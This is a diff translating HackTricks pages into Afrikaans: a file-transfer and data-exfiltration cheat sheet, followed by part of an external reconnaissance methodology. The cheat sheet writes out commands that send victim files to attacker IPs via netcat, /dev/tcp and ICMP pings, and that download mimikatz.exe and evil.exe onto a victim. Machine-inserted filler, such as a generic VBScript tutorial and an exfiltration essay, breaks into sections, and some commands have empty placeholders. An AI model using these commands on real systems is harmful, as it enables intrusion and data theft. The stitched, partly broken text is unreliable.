+Om die risiko van data-uitfiltering van 'n FTP-bediener te verminder, kan die volgende maatreëls geneem word: + +1. **Sterk wagwoorde**: Stel sterk wagwoorde in vir die FTP-bediener en vermy die gebruik van maklik raadbare wagwoorde. +2. **Toegangsbeheer**: Beperk die toegang tot die FTP-bediener deur slegs geakkrediteerde gebruikers toe te laat. +3. **Versleuteling**: Gebruik versleuteling om die oordrag van data tussen die kliënt en die bediener te beskerm. +4. **Besoekbeperkings**: Beperk die toegang tot die FTP-bediener deur slegs spesifieke IP-adresse toe te laat. +5. **Opdaterings en patches**: Verseker dat die FTP-bedieningsagteware opgedateer word met die nuutste opdaterings en patches om bekende kwesbaarhede te vermy. + +#### Gevolgtrekking + +Die uitfiltering van data van 'n FTP-bediener kan 'n effektiewe tegniek wees vir die verkryging van gevoelige inligting. Dit is belangrik om die nodige maatreëls te tref om die risiko van data-uitfiltering te verminder en die veiligheid van die FTP-bediener te verseker. ```bash apt-get update && apt-get install pure-ftp ``` @@ -167,9 +385,7 @@ mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` - -### **Windows** client - +### **Windows** kliënt ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt @@ -180,10 +396,9 @@ echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe bedreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} @@ -191,34 +406,70 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track ## SMB -Kali as server - +Kali as bediener ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd` ``` - -Or create a smb share **using samba**: - +Of skep 'n smb-deel **deur samba te gebruik**: ```bash apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] - comment = Samba on Ubuntu - path = /tmp/smb - read only = no - browsable = yes - guest ok = Yes +comment = Samba on Ubuntu +path = /tmp/smb +read only = no +browsable = yes +guest ok = Yes #Start samba service smbd restart ``` +# Exfiltrasie -Windows +## Inleiding +Exfiltrasie is die proses waardeur 'n aanvaller gesteelde data uit 'n teikenstelsel verwyder en oordra na 'n eksterne bediener of stoorplek. Hierdie tegniek word dikwels gebruik deur aanvallers om gevoelige inligting te ontvreem, soos kredietkaartbesonderhede, wagwoorde, persoonlike inligting en vertroulike dokumente. + +## Metodes van Exfiltrasie + +### 1. Bestandsoordrag + +Hierdie metode behels die oordra van gesteelde data deur dit in 'n bestand te verpak en dit dan oor te dra na 'n eksterne bediener. Dit kan gedoen word deur gebruik te maak van protokolle soos HTTP, FTP, SMB of SMTP. + +### 2. Versteekte data in beeldlêers + +Aanvallers kan data versteek in beeldlêers deur dit te versluier en dan as 'n normale beeldlêer te laat voorkom. Hierdie metode maak gebruik van steganografie, wat die kunst is om data te versteek binne 'n ander tipe lêer sonder om die oorspronklike lêer te beskadig. + +### 3. Gebruik van DNS + +Aanvallers kan DNS-kanale gebruik om gesteelde data te exfiltreer. Hierdie metode behels die gebruik van DNS-navrae om data te verpak en oor te dra na 'n eksterne bediener. Dit kan gedoen word deur die DNS-navrae te manipuleer en die gesteelde data as deel van die DNS-navrae te versluier. + +### 4. Gebruik van uitvoerbare lêers + +Aanvallers kan gesteelde data in 'n uitvoerbare lêer insluit en dit dan oor te dra na 'n eksterne bediener. Hierdie metode maak gebruik van die uitvoerbare lêer se funksionaliteit om die gesteelde data te verpak en oor te dra. + +### 5. Gebruik van e-pos + +Aanvallers kan gesteelde data as 'n e-posaanhangsel stuur na 'n eksterne e-posrekening. Hierdie metode maak gebruik van die e-posprotokol om die gesteelde data te verpak en oor te dra. + +## Voorkoming van Exfiltrasie + +Om exfiltrasie te voorkom, kan die volgende maatreëls geneem word: + +- Monitor die netwerkverkeer vir verdagte aktiwiteit en ongewone data-oordragte. +- Beperk die toegang tot gevoelige data en stel streng toegangsbeheerbeleide in. +- Implementeer 'n firewall en gebruik netwerksegmentering om die verspreiding van gesteelde data te beperk. +- Verseker dat alle sagteware en bedryfstelsels opgedateer word met die nuutste beveiligingspatches. +- Stel 'n sterk wagwoordbeleid in en moedig gebruikers aan om unieke en veilige wagwoorde te gebruik. +- Bewusmaking van gebruikers oor die risiko's van phishing-aanvalle en die deel van persoonlike inligting. + +## Slotwoord + +Exfiltrasie is 'n kritieke bedreiging vir die veiligheid van data en moet ernstig opgeneem word. Deur bewus te wees van die verskillende metodes van exfiltrasie en deur die nodige voorkomingsmaatreëls te tref, kan organisasies hulself beskerm teen hierdie aanvalstegniek. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials @@ -226,54 +477,98 @@ CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentia WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk: ``` - ## SCP -The attacker has to have SSHd running. - +Die aanvaller moet SSHd laat loop. ```bash -scp @:/ +scp @:/ ``` - ## SSHFS -If the victim has SSH, the attacker can mount a directory from the victim to the attacker. - +As die slagoffer SSH het, kan die aanvaller 'n gids van die slagoffer na die aanvaller se rekenaar koppel. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` - ## NC +NC (Netcat) is a versatile networking utility that can be used for various purposes, including exfiltration of data. It allows for easy creation of TCP or UDP connections between two machines, making it a useful tool for transferring data from a compromised system to an external server. + +To exfiltrate data using NC, you can follow these steps: + +1. Set up a listener on the external server using the following command: + ``` + nc -l -p > + ``` + Replace `` with the desired port number and `` with the name of the file where the data will be saved. + +2. On the compromised system, use the following command to send the data to the external server: + ``` + nc < + ``` + Replace `` with the IP address of the external server, `` with the same port number used in the listener, and `` with the name of the file containing the data to be exfiltrated. + +3. Once the command is executed, the data will be transferred from the compromised system to the external server and saved in the specified output file. + +NC can also be used in combination with other tools and techniques to enhance exfiltration capabilities. For example, you can compress the data before sending it using NC, or encrypt it to ensure confidentiality during transit. + +It is important to note that exfiltration of data without proper authorization is illegal and unethical. This information is provided for educational purposes only, and should not be used for any malicious activities. ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` +### Laai lêer af van slagoffer -## /dev/tcp +Om 'n lêer van die slagoffer se stelsel af te laai, kan jy die `/dev/tcp`-benadering gebruik. Hier is die sintaksis: -### Download file from victim +```bash +cat < /dev/tcp// > +``` +Vervang `` met die IP-adres van die slagoffer se stelsel en `` met die poortnommer waarop die lêer beskikbaar is. Vervang ook `` met die pad en naam van die lêer waarin jy die aflaai wil stoor. + +Hier is 'n voorbeeld van hoe jy dit kan gebruik: + +```bash +cat < /dev/tcp/192.168.0.100/8080 > /tmp/secret_file.txt +``` + +Hierdie opdrag sal die lêer `secret_file.txt` aflaai vanaf die stelsel met die IP-adres `192.168.0.100` op poort `8080` en dit stoor in die `/tmp`-gids. ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` +### Laai lêer op na slagoffer -### Upload file to victim +Om 'n lêer na 'n slagoffer te laai, kan jy die volgende metodes gebruik: +#### 1. HTTP-aanvraag + +Jy kan 'n HTTP-aanvraag stuur om die lêer na die slagoffer se bediener te stuur. Dit kan gedoen word deur die `POST`-metode te gebruik en die lêer as 'n vormdata te stuur. Die slagoffer se bediener moet die lêer aanvaar en stoor op 'n plek waar jy toegang daartoe het. + +#### 2. E-pos + +Jy kan die lêer as 'n aanhangsel in 'n e-pos stuur na 'n e-posadres wat deur die slagoffer gebruik word. Die slagoffer moet die e-pos ontvang en die aanhangsel aflaai. Dit vereis dat jy toegang het tot die slagoffer se e-posrekening of 'n manier het om die e-pos te onderskep. + +#### 3. Bestandsoordragprotokolle + +As jy toegang het tot die slagoffer se rekenaar of netwerk, kan jy gebruik maak van bestandsoordragprotokolle soos FTP, SFTP, SCP of SMB om die lêer na 'n plek te stuur waar jy toegang daartoe het. Hierdie metode vereis dat jy toegang het tot die slagoffer se rekenaar of netwerk en dat die nodige protokolle geïnstalleer en gekonfigureer is. + +#### 4. Cloud-gebaseerde dienste + +As die slagoffer gebruik maak van 'n wolkgebaseerde diens soos Google Drive, Dropbox of OneDrive, kan jy die lêer na die slagoffer se rekening oplaai. Dit vereis dat jy toegang het tot die slagoffer se rekening of 'n manier het om die toegangslegitimasie te bekom. + +Onthou, die laai van 'n lêer na 'n slagoffer se stelsel sonder hul toestemming is onwettig en word as 'n aanval beskou. Wees verantwoordelik en gebruik hierdie tegnieke slegs binne die raamwerk van wettige toetse of met toestemming van die eienaar van die stelsel. ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt ``` - -thanks to **@BinaryShadow\_** +Dankie aan **@BinaryShadow\_** ## **ICMP** - ```bash # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done @@ -284,64 +579,177 @@ xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ``` - -In **victim**, connect to the Kali server: - +In **slagoffer**, verbind met die Kali-bediener: ```bash tftp -i get nc.exe ``` - ## PHP -Download a file with a PHP oneliner: - +Laai 'n lêer af met 'n PHP eenregtelik: ```bash echo "" > down2.php ``` - ## VBScript +VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft. It is often used for automating tasks and creating dynamic web pages. VBScript is commonly used in Windows environments and can be executed using the Windows Script Host (WSH). + +### Basic Syntax + +VBScript code is written in plain text and saved with a .vbs file extension. Here is an example of a basic VBScript program: + +```vbs +MsgBox "Hello, World!" +``` + +This code will display a message box with the text "Hello, World!" when executed. + +### Variables + +In VBScript, variables are used to store data. They can be declared using the `Dim` keyword. Here is an example: + +```vbs +Dim name +name = "John" +``` + +In this example, a variable named `name` is declared and assigned the value "John". + +### Control Structures + +VBScript supports various control structures, such as `If...Then...Else`, `For...Next`, and `Do...Loop`. These structures allow you to control the flow of your program based on certain conditions. Here is an example of an `If...Then...Else` statement: + +```vbs +Dim age +age = 18 + +If age >= 18 Then + MsgBox "You are an adult." +Else + MsgBox "You are a minor." +End If +``` + +This code will display a message box based on the value of the `age` variable. + +### Functions + +VBScript provides built-in functions that can be used to perform various operations. For example, the `MsgBox` function is used to display a message box. Here is an example: + +```vbs +MsgBox "Hello, World!" +``` + +This code will display a message box with the text "Hello, World!". + +### File Operations + +VBScript can also be used to perform file operations, such as reading from and writing to files. The `FileSystemObject` is used to interact with files and folders. Here is an example of reading from a file: + +```vbs +Dim fso, file, text + +Set fso = CreateObject("Scripting.FileSystemObject") +Set file = fso.OpenTextFile("C:\path\to\file.txt", 1) +text = file.ReadAll +file.Close + +MsgBox text +``` + +This code will read the contents of the file "C:\path\to\file.txt" and display it in a message box. + +### Conclusion + +VBScript is a powerful scripting language that can be used for various tasks, including automation and web development. It provides a wide range of features and built-in functions that make it a versatile choice for Windows environments. ```bash Attacker> python -m SimpleHTTPServer 80 ``` - -**Victim** - +**Slagoffer** ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs @@ -373,18 +781,15 @@ echo ts.Close >> wget.vbs ```bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` - ## Debug.exe -The `debug.exe` program not only allows inspection of binaries but also has the **capability to rebuild them from hex**. This means that by providing an hex of a binary, `debug.exe` can generate the binary file. However, it's important to note that debug.exe has a **limitation of assembling files up to 64 kb in size**. - +Die `debug.exe` program maak dit nie net moontlik om binêre lêers te ondersoek nie, maar het ook die **vermoë om hulle te herbou vanaf heks**. Dit beteken dat deur 'n heks van 'n binêre lêer te voorsien, `debug.exe` die binêre lêer kan genereer. Dit is egter belangrik om daarop te let dat debug.exe 'n **beperking het om lêers tot 64 kb in grootte saam te stel**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` - -Then copy-paste the text into the windows-shell and a file called nc.exe will be created. +Kopieer en plak dan die teks in die Windows-skulp en 'n lêer genaamd nc.exe sal geskep word. * [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html) @@ -394,21 +799,21 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index 2768e4307..8edcefb3a 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -1,60 +1,57 @@ -# External Recon Methodology +# Eksterne Verkenning Metodologie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Assets discoveries +## Bate-ontdekkings -> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. +> So jy is vertel dat alles wat aan 'n maatskappy behoort binne die omvang is, en jy wil uitvind wat hierdie maatskappy eintlik besit. -The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to: +Die doel van hierdie fase is om al die **maatskappye wat deur die hoofmaatskappy besit word** te verkry en dan al die **bates** van hierdie maatskappye. Om dit te doen, gaan ons: -1. Find the acquisitions of the main company, this will give us the companies inside the scope. -2. Find the ASN (if any) of each company, this will give us the IP ranges owned by each company -3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively) -4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively). +1. Vind die verkrygings van die hoofmaatskappy, dit sal ons die maatskappye binne die omvang gee. +2. Vind die ASN (indien enige) van elke maatskappy, dit sal ons die IP-reeks besit deur elke maatskappy gee. +3. Gebruik omgekeerde whois-opsoek na ander inskrywings (organisasienames, domeine...) wat verband hou met die eerste een (dit kan rekursief gedoen word). +4. Gebruik ander tegnieke soos shodan `org`en `ssl`filters om na ander bates te soek (die `ssl`-truk kan rekursief gedoen word). -### **Acquisitions** +### **Verkrygings** -First of all, we need to know which **other companies are owned by the main company**.\ -One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\ -Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**. +Eerstens moet ons weet watter **ander maatskappye deur die hoofmaatskappy besit word**.\ +Een opsie is om [https://www.crunchbase.com/](https://www.crunchbase.com) te besoek, **soek** vir die **hoofmaatskappy**, en **klik** op "**verkrygings**". Daar sal jy ander maatskappye sien wat deur die hoofmaatskappy verkry is.\ +'n Ander opsie is om die **Wikipedia**-bladsy van die hoofmaatskappy te besoek en te soek na **verkrygings**. -> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. +> Ok, op hierdie punt behoort jy al die maatskappye binne die omvang te ken. Kom ons vind uit hoe om hul bates te vind. ### **ASNs** -An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\ -An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. - -It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\ -You can **search** by company **name**, by **IP** or by **domain** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\ -**Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link. +'n Autonome stelselnommer (**ASN**) is 'n **unieke nommer** wat toegewys word aan 'n **autonome stelsel** (AS) deur die **Internet Assigned Numbers Authority (IANA)**.\ +'n **AS** bestaan uit **blokke** van **IP-adresse** wat 'n duidelik gedefinieerde beleid het vir toegang tot eksterne netwerke en deur 'n enkele organisasie geadministreer word, maar uit verskeie operateurs kan bestaan. +Dit is interessant om uit te vind of die **maatskappy enige ASN toegewys het** om sy **IP-reeks** te vind. Dit sal interessant wees om 'n **kwesbaarheidstoets** uit te voer teen al die **gasheer** binne die **omvang** en te soek na domeine binne hierdie IP's.\ +Jy kan **soek** op maatskappy **naam**, op **IP** of op **domein** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\ +**Afhanklik van die streek van die maatskappy kan hierdie skakels nuttig wees om meer data in te samel:** [**AFRINIC**](https://www.afrinic.net) **(Afrika),** [**Arin**](https://www.arin.net/about/welcome/region/)**(Noord-Amerika),** [**APNIC**](https://www.apnic.net) **(Asië),** [**LACNIC**](https://www.lacnic.net) **(Latyns-Amerika),** [**RIPE NCC**](https://www.ripe.net) **(Europa). In elk geval verskyn waarskynlik alle** nuttige inligting **(IP-reeks en Whois)** reeds in die eerste skakel. ```bash #You can try "automate" this with amass, but it's not very recommended amass intel -org tesla amass intel -asn 8911,50313,394161 ``` - -Also, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** subdomain enumeration automatically aggregates and summarizes ASNs at the end of the scan. - +Verder, [**BBOT**](https://github.com/blacklanternsecurity/bbot) se subdomeinversameling aggregeer en som die ASNs outomaties op aan die einde van die skandering. ```bash bbot -t tesla.com -f subdomain-enum ... @@ -71,62 +68,59 @@ bbot -t tesla.com -f subdomain-enum [INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+ ``` +Jy kan die IP-reeks van 'n organisasie vind deur [http://asnlookup.com/](http://asnlookup.com) te gebruik (dit het 'n gratis API).\ +Jy kan die IP en ASN van 'n domein vind deur [http://ipv4info.com/](http://ipv4info.com) te gebruik. -You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\ -You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com). +### **Op soek na kwesbaarhede** -### **Looking for vulnerabilities** +Op hierdie punt weet ons **al die bates binne die omvang**, so as jy toegelaat word, kan jy 'n **kwesbaarheidsskander** (Nessus, OpenVAS) oor al die gasheerstelsels uitvoer.\ +Jy kan ook 'n paar [**poortskanderings**](../pentesting-network/#discovering-hosts-from-the-outside) **uitvoer of dienste soos** shodan **gebruik om oop poorte te vind en, afhangende van wat jy vind, moet jy in hierdie boek kyk hoe om verskeie moontlike dienste te pentest.\ +**Dit is ook die moeite werd om te vermeld dat jy ook 'n paar** standaard gebruikersnaam **en** wagwoorde **lyste kan voorberei en probeer om dienste te** bruteforce met [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). -At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\ -Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\ -**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). +## Domeine -## Domains +> Ons ken al die maatskappye binne die omvang en hul bates, dit is tyd om die domeine binne die omvang te vind. -> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. +*Let daarop dat jy in die volgende voorgestelde tegnieke ook subdomeine kan vind en daardie inligting nie onderskat moet word nie.* -_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._ +Eerstens moet jy soek na die **hoofdomein**(e) van elke maatskappy. Byvoorbeeld, vir _Tesla Inc._ gaan dit _tesla.com_ wees. -First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. - -### **Reverse DNS** - -As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8) +### **Omgekeerde DNS** +Nadat jy al die IP-reeks van die domeine gevind het, kan jy probeer om **omgekeerde DNS-opsoekings** op daardie **IP's uit te voer om meer domeine binne die omvang te vind**. Probeer om 'n DNS-bediener van die slagoffer of 'n bekende DNS-bediener (1.1.1.1, 8.8.8.8) te gebruik. ```bash dnsrecon -r -n #DNS reverse of all of the addresses dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns ``` +Vir hierdie om te werk, moet die administrateur die PTR handmatig aktiveer.\ +Jy kan ook 'n aanlyn hulpmiddel gebruik vir hierdie inligting: [http://ptrarchive.com/](http://ptrarchive.com) -For this to work, the administrator has to enable manually the PTR.\ -You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com) +### **Omgekeerde Whois (lus)** -### **Reverse Whois (loop)** +Binne 'n **whois** kan jy baie interessante **inligting** vind soos **organisasienaam**, **adres**, **e-posse**, telefoonnommers... Maar wat nog interessanter is, is dat jy **meer bates wat verband hou met die maatskappy** kan vind as jy **omgekeerde whois-opsoekings deur enige van daardie velde** uitvoer (byvoorbeeld ander whois-registre waar dieselfde e-pos verskyn).\ +Jy kan aanlyn hulpmiddels soos die volgende gebruik: -Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\ -You can use online tools like: +* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Gratis** +* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Gratis** +* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Gratis** +* [https://www.whoxy.com/](https://www.whoxy.com) - **Gratis** web, nie gratis API nie. +* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Nie gratis nie +* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Nie gratis (slegs **100 gratis** soektogte) +* [https://www.domainiq.com/](https://www.domainiq.com) - Nie gratis nie -* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** -* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** -* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Free** -* [https://www.whoxy.com/](https://www.whoxy.com) - **Free** web, not free API. -* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Not free -* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free (only **100 free** searches) -* [https://www.domainiq.com/](https://www.domainiq.com) - Not Free +Jy kan hierdie taak outomatiseer deur [**DomLink** ](https://github.com/vysecurity/DomLink)(vereis 'n whoxy API-sleutel) te gebruik.\ +Jy kan ook 'n paar outomatiese omgekeerde whois-ontdekkings doen met [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` -You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)(requires a whoxy API key).\ -You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` +**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.** -**Note that you can use this technique to discover more domain names every time you find a new domain.** +### **Opvolgers** -### **Trackers** +As jy dieselfde ID van dieselfde opvolger op 2 verskillende bladsye vind, kan jy aanneem dat **beide bladsye** deur dieselfde span **bestuur word**.\ +Byvoorbeeld, as jy dieselfde **Google Analytics ID** of dieselfde **Adsense ID** op verskeie bladsye sien. -If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\ -For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. - -There are some pages and tools that let you search by these trackers and more: +Daar is 'n paar bladsye en hulpmiddels wat jou in staat stel om daardeur te soek en meer: * [**Udon**](https://github.com/dhn/udon) * [**BuiltWith**](https://builtwith.com) @@ -136,106 +130,92 @@ There are some pages and tools that let you search by these trackers and more: ### **Favicon** -Did you know that we can find related domains and sub domains to our target by looking for the same favicon 